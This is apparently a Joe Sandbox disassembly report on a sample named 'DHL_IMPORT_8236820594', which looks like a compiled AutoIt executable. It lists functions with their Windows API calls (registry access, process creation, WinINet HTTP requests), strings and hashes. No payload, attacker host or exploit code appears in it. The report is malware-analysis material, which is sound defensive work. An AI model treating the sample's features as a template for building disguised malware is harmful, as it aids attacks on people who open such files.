_wcslen.LIBCMT ref: 00570A01
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00570A54
_wcslen.LIBCMT ref: 00570A8A
_wcslen.LIBCMT ref: 00570B06
_wcslen.LIBCMT ref: 00570B81

Part of subcall function 004FF9F2: _wcslen.LIBCMT ref: 004FF9FD

Part of subcall function 00542BE8: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00542BFA

Strings

COLLAPSE, xrefs: 00570B01, 00570B1C
SELECT, xrefs: 00570D11
GETTEXT, xrefs: 00570C97
GETSELECTED, xrefs: 00570C4E
ISCHECKED, xrefs: 00570CE1
GETTOTALCOUNT, xrefs: 005709F2, 00570A17
EXPAND, xrefs: 00570BF8
GETITEMCOUNT, xrefs: 00570C1E
EXISTS, xrefs: 00570B7C, 00570B97
CHECK, xrefs: 00570A85, 00570AA0
UNCHECK, xrefs: 00570D3E

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _wcslen$MessageSend$BuffCharUpper
String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
API String ID: 1103490817-4258414348
Opcode ID: 94389e5e68581dbd9afd9e7a06bcb81c6123611ce00716e2d99c5835dd1bec6b
Instruction ID: 9299163df8b7fa6fa672aaac4db0dfb4b5fb4089ff5c58eeeee141024287d664
Opcode Fuzzy Hash: 94389e5e68581dbd9afd9e7a06bcb81c6123611ce00716e2d99c5835dd1bec6b
Instruction Fuzzy Hash: 4AE18771208341DFC714DF26D49092ABBE2BF98318F14995DF89A9B3A2D730EE45DB81

Function 0056C998 Relevance: 30.0, APIs: 7, Strings: 10, Instructions: 242COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0056B6AE,?,?), ref: 0056C9B5
_wcslen.LIBCMT ref: 0056C9F1
_wcslen.LIBCMT ref: 0056CA68
_wcslen.LIBCMT ref: 0056CA9E
_wcslen.LIBCMT ref: 0056CAF9
_wcslen.LIBCMT ref: 0056CB2F
_wcslen.LIBCMT ref: 0056CB7F

Strings

HKEY_LOCAL_MACHINE, xrefs: 0056CA62, 0056CA67
HKEY_CURRENT_CONFIG, xrefs: 0056CB79, 0056CB7E
HKEY_USERS, xrefs: 0056CBDF
HKCR, xrefs: 0056CB29, 0056CB2E
HKCC, xrefs: 0056CBAC
HKEY_CURRENT_USER, xrefs: 0056CBBD
HKEY_CLASSES_ROOT, xrefs: 0056CAF3, 0056CAF8
HKCU, xrefs: 0056CBCE
HKLM, xrefs: 0056CA98, 0056CA9D
HKU, xrefs: 0056CBF0

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _wcslen$BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 1256254125-909552448
Opcode ID: 5e40a907a029d88f49758a0310b6a2ed2267502486b479835b2b28ed1720c53a
Instruction ID: 5d00fed523c7ab40b07e0654ef9f9802999c89da1090c40566f298f0057b7910
Opcode Fuzzy Hash: 5e40a907a029d88f49758a0310b6a2ed2267502486b479835b2b28ed1720c53a
Instruction Fuzzy Hash: 7871133260016A8BCB20DEBDCC515BE3F91BFA5754F650529FCE69B294EA35CD84C3A0

Function 0057833C Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 196windowlibraryCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0057835A
_wcslen.LIBCMT ref: 0057836E
_wcslen.LIBCMT ref: 00578391
_wcslen.LIBCMT ref: 005783B4
LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 005783F2
LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,0057361A,?), ref: 0057844E
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00578487
LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 005784CA
LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00578501
FreeLibrary.KERNEL32(?), ref: 0057850D
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0057851D
DestroyIcon.USER32(?), ref: 0057852C
SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00578549
SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00578555

Strings

.icl, xrefs: 00578368
.dll, xrefs: 005783AB
.exe, xrefs: 00578388

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
String ID: .dll$.exe$.icl
API String ID: 799131459-1154884017
Opcode ID: 6da5bc165c8a2a1d87a47ea3cc27671d1df841f999f7673e71d9fac17063a343
Instruction ID: c6e5e7f1ecaf65988663ea53ffec2bea570a06a3301a43a79eff66d619bb1c36
Opcode Fuzzy Hash: 6da5bc165c8a2a1d87a47ea3cc27671d1df841f999f7673e71d9fac17063a343
Instruction Fuzzy Hash: FF61E2B1540215BEEB14DF64EC49FBE7FA8BB08711F108609F919D61D1DBB4A980EBA0

Function 004E7778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON

Download Yara Rule

Strings

#comments-start, xrefs: 004E785F, 004E78B1
#include, xrefs: 004E7847
#notrayicon, xrefs: 004E77E7
Cannot parse #include, xrefs: 00525279
#pragma compile, xrefs: 004E77D3
Unterminated group of comments, xrefs: 0052528C
#comments-end, xrefs: 004E78D9
Bad directive syntax error, xrefs: 0052519A
#include-once, xrefs: 004E782F
#cs, xrefs: 004E7873, 004E78C5
#ce, xrefs: 004E78ED
#requireadmin, xrefs: 004E77FF
#OnAutoItStartRegister, xrefs: 004E7817
', xrefs: 00525169
", xrefs: 00525153

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID:
String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 0-1645009161
Opcode ID: 62de8dc830a1165e4919e140f7a3c17ae8a58961d512284cc7fc5b32fdf0e3c9
Instruction ID: 5c16a41ade62c059c730b9111e8b21b5f9d31e17f62e844c6faa60b750745320
Opcode Fuzzy Hash: 62de8dc830a1165e4919e140f7a3c17ae8a58961d512284cc7fc5b32fdf0e3c9
Instruction Fuzzy Hash: 2F810570600215BBDB20AF22DC46FBF3F68BF55310F044026F949AA1D2EB78D951CBA5

Function 00545A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000063), ref: 00545A2E
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00545A40
SetWindowTextW.USER32(?,?), ref: 00545A57
GetDlgItem.USER32(?,000003EA), ref: 00545A6C
SetWindowTextW.USER32(00000000,?), ref: 00545A72
GetDlgItem.USER32(?,000003E9), ref: 00545A82
SetWindowTextW.USER32(00000000,?), ref: 00545A88
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00545AA9
SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00545AC3
GetWindowRect.USER32(?,?), ref: 00545ACC
_wcslen.LIBCMT ref: 00545B33
SetWindowTextW.USER32(?,?), ref: 00545B6F
GetDesktopWindow.USER32 ref: 00545B75
GetWindowRect.USER32(00000000), ref: 00545B7C
MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00545BD3
GetClientRect.USER32(?,?), ref: 00545BE0
PostMessageW.USER32(?,00000005,00000000,?), ref: 00545C05
SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00545C2F

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
String ID:
API String ID: 895679908-0
Opcode ID: 669d4cbe8a6d4ef52debe29b7edeae1b0d0db9fa89eba52ae30fd23370bd2ee9
Instruction ID: f4733e00c2800eb4b45ba881fe4b005c907b709c71b3d70de57dd8dcd1afe427
Opcode Fuzzy Hash: 669d4cbe8a6d4ef52debe29b7edeae1b0d0db9fa89eba52ae30fd23370bd2ee9
Instruction Fuzzy Hash: 28718F31900B05AFDB20DFA8CE89AAEBFF5FF48708F10491CE546A25A1E770E944DB10

Function 005430F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0054318D
_wcslen.LIBCMT ref: 005431F8

Strings

[Z, xrefs: 0054339A
CLASSNN, xrefs: 005431F3, 00543204
INSTANCE, xrefs: 00543453
REGEXPCLASS, xrefs: 00543255, 00543266
CLASS, xrefs: 00543188, 005431A5
NAME, xrefs: 00543335, 00543346
TEXT, xrefs: 0054347C

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _wcslen
String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[Z
API String ID: 176396367-1803612052
Opcode ID: 17b8092284a8493baf354d0b623ef7625d0b92afadcd7168d94217f961d595b2
Instruction ID: 0e72ad81606226632edab36bede53b79c78182da89eb3f2282c1df19f17ed6aa
Opcode Fuzzy Hash: 17b8092284a8493baf354d0b623ef7625d0b92afadcd7168d94217f961d595b2
Instruction Fuzzy Hash: D1E1F831A00516ABCF18DF74C445AEDBFB0BF54718F54852AE456F72A0EB70AE85C790

Function 005000C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON

Download Yara Rule

APIs

__scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 005000C6

Part of subcall function 005000ED: InitializeCriticalSectionAndSpinCount.KERNEL32(005B070C,00000FA0,D0DF77E0,?,?,?,?,005223B3,000000FF), ref: 0050011C
Part of subcall function 005000ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,005223B3,000000FF), ref: 00500127
Part of subcall function 005000ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,005223B3,000000FF), ref: 00500138
Part of subcall function 005000ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0050014E
Part of subcall function 005000ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0050015C
Part of subcall function 005000ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0050016A
Part of subcall function 005000ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00500195
Part of subcall function 005000ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 005001A0

___scrt_fastfail.LIBCMT ref: 005000E7

Part of subcall function 005000A3: __onexit.LIBCMT ref: 005000A9

Strings

api-ms-win-core-synch-l1-2-0.dll, xrefs: 00500122
SleepConditionVariableCS, xrefs: 00500154
InitializeConditionVariable, xrefs: 00500148
WakeAllConditionVariable, xrefs: 00500162
kernel32.dll, xrefs: 00500133

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
API String ID: 66158676-1714406822
Opcode ID: 5510b6994cb601092d278f51f91cb8e9257ce8791ab62cd7f661b6f5a6b16235
Instruction ID: 1d21adf2b51b3f1585bbf7254ef69418802c909bdbd1c183ea3015646860aeae
Opcode Fuzzy Hash: 5510b6994cb601092d278f51f91cb8e9257ce8791ab62cd7f661b6f5a6b16235
Instruction Fuzzy Hash: 2C212632A447116BE7209B74BC0DB6E7F94FF56B60F00513EF909A22D1DF749804EA90

Function 005544C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(00000000,00000000,0057CC08), ref: 00554527
_wcslen.LIBCMT ref: 0055453B
_wcslen.LIBCMT ref: 00554599
_wcslen.LIBCMT ref: 005545F4
_wcslen.LIBCMT ref: 0055463F
_wcslen.LIBCMT ref: 005546A7

Part of subcall function 004FF9F2: _wcslen.LIBCMT ref: 004FF9FD

GetDriveTypeW.KERNEL32(?,005A6BF0,00000061), ref: 00554743

Strings

all, xrefs: 00554531, 00554536
removable, xrefs: 005545EA, 005545EF
cdrom, xrefs: 0055458F, 00554594
unknown, xrefs: 00554708
network, xrefs: 0055469D, 005546A2
ramdisk, xrefs: 005546F1
fixed, xrefs: 00554635, 0055463A

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: _wcslen$BuffCharDriveLowerType
String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
API String ID: 2055661098-1000479233
Opcode ID: c3f528640e3466bd53f30a633487293434d249508be6313d7f79007371c9b653
Instruction ID: cc0840c3e1bb10733f53801c19e2dbe7855a8569ec3b8dde948bc588decb869a
Opcode Fuzzy Hash: c3f528640e3466bd53f30a633487293434d249508be6313d7f79007371c9b653
Instruction Fuzzy Hash: FAB1E5715083029FC710DF29C8A0A6EBBE5BFA575AF50491EF896C7291E730D889CF52

Function 0057911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON

Download Yara Rule

APIs

Part of subcall function 004F9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 004F9BB2

DragQueryPoint.SHELL32(?,?), ref: 00579147

Part of subcall function 00577674: ClientToScreen.USER32(?,?), ref: 0057769A
Part of subcall function 00577674: GetWindowRect.USER32(?,?), ref: 00577710
Part of subcall function 00577674: PtInRect.USER32(?,?,00578B89), ref: 00577720

SendMessageW.USER32(?,000000B0,?,?), ref: 005791B0
DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 005791BB
DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 005791DE
SendMessageW.USER32(?,000000C2,00000001,?), ref: 00579225
SendMessageW.USER32(?,000000B0,?,?), ref: 0057923E
SendMessageW.USER32(?,000000B1,?,?), ref: 00579255
SendMessageW.USER32(?,000000B1,?,?), ref: 00579277
DragFinish.SHELL32(?), ref: 0057927E
DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00579371

Strings

@GUI_DROPID, xrefs: 0057929E
@GUI_DRAGFILE, xrefs: 00579320
p#[, xrefs: 005792BB
@GUI_DRAGID, xrefs: 005792E9

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#[
API String ID: 221274066-2364580897
Opcode ID: 7ddc5a9e4f8f2bc2c51659e4143ad25cb62b7644df4b773099c4e6277ea920b7
Instruction ID: 166238bd66aee96b5b047dfaf5c42cfa99cc2bc75490f9fc136e7c5977a2159f
Opcode Fuzzy Hash: 7ddc5a9e4f8f2bc2c51659e4143ad25cb62b7644df4b773099c4e6277ea920b7
Instruction Fuzzy Hash: FE618871108341AFC700EF65EC89DAFBFE8FF98350F40091EB595961A1DB30AA49DB66

Function 0056AFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 0056B198
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0056B1B0
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0056B1D4
_wcslen.LIBCMT ref: 0056B200
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0056B214
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0056B236
_wcslen.LIBCMT ref: 0056B332

Part of subcall function 005505A7: GetStdHandle.KERNEL32(000000F6), ref: 005505C6

_wcslen.LIBCMT ref: 0056B34B
_wcslen.LIBCMT ref: 0056B366
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0056B3B6
GetLastError.KERNEL32(00000000), ref: 0056B407
CloseHandle.KERNEL32(?), ref: 0056B439
CloseHandle.KERNEL32(00000000), ref: 0056B44A
CloseHandle.KERNEL32(00000000), ref: 0056B45C
CloseHandle.KERNEL32(00000000), ref: 0056B46E
CloseHandle.KERNEL32(?), ref: 0056B4E3

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
String ID:
API String ID: 2178637699-0
Opcode ID: 1d84edac28570f1e75d271195c23af26512cdc1a9463618bd0ee14864c877b94
Instruction ID: 13529d842d5386e35970de02e01ab9dc0ce8858f04ff95d64f6b5e069068617b
Opcode Fuzzy Hash: 1d84edac28570f1e75d271195c23af26512cdc1a9463618bd0ee14864c877b94
Instruction Fuzzy Hash: C1F1BF316043409FDB14EF25C895B2EBBE1BF85314F14895EF9958B2A2DB31EC84CB52

Function 004E326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(005B1990), ref: 00522F8D
GetMenuItemCount.USER32(005B1990), ref: 0052303D
GetCursorPos.USER32(?), ref: 00523081
SetForegroundWindow.USER32(00000000), ref: 0052308A
TrackPopupMenuEx.USER32(005B1990,00000000,?,00000000,00000000,00000000), ref: 0052309D
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 005230A9

Strings

0, xrefs: 004E327D

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 36266755-4108050209
Opcode ID: d8a12568db338b1391937739341768654203766aecfe28d763014e16941c49be
Instruction ID: c08647bcf4b5c08cb869a24d55f68af1454f16196c2c87c863553b31298113b2
Opcode Fuzzy Hash: d8a12568db338b1391937739341768654203766aecfe28d763014e16941c49be
Instruction Fuzzy Hash: 9B713B34640216BEEB258F25EC8DFAABF74FF01324F204246F6146A1E0C7B5AD54EB51

Function 00576CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00576DEB

Part of subcall function 004E6B57: _wcslen.LIBCMT ref: 004E6B6A

CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00576E5F
SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00576E81
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00576E94
DestroyWindow.USER32(?), ref: 00576EB5
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,004E0000,00000000), ref: 00576EE4
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00576EFD
GetDesktopWindow.USER32 ref: 00576F16
GetWindowRect.USER32(00000000), ref: 00576F1D
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00576F35
SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00576F4D

Part of subcall function 004F9944: GetWindowLongW.USER32(?,000000EB), ref: 004F9952

Strings

0, xrefs: 00576D98
tooltips_class32, xrefs: 00576E58, 00576EDD

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.000000000057C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659323300.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659355917.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659367272.00000000005B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4e0000_DHL_IMPORT_8236820594.jbxd

Similarity

API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
String ID: 0$tooltips_class32
API String ID: 2429346358-3619404913
Opcode ID: c39e05738e0519af77f53d1d56c7d3f5ffbecd358f1b73c50a5cb5d15da6057e
Instruction ID: 0e7cc2572b3684ab06fa526d7ae2dc8dc4b84a34a98ca82469406e6e3ea8a8da
Opcode Fuzzy Hash: c39e05738e0519af77f53d1d56c7d3f5ffbecd358f1b73c50a5cb5d15da6057e
Instruction Fuzzy Hash: 89719970100640AFDB21DF29EC98FABBFE9FB98304F54451EF98987261C770A949EB15

Function 0055C476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0055C4B0
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0055C4C3
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0055C4D7
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0055C4F0
InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 0055C533
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 0055C549
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0055C554
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0055C584
GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 0055C5DC
SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 0055C5F0
InternetCloseHandle.WININET(00000000), ref: 0055C5FB

Strings

, xrefs: 0055C575

Memory Dump Source

Source File: 00000000.00000002.1659283695.00000000004E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004E0000, based on PE: true

Associated: 00000000.00000002.1659273246.00000000004E0000.00000002.00000001.01000000.00000003.sdmpDownload File
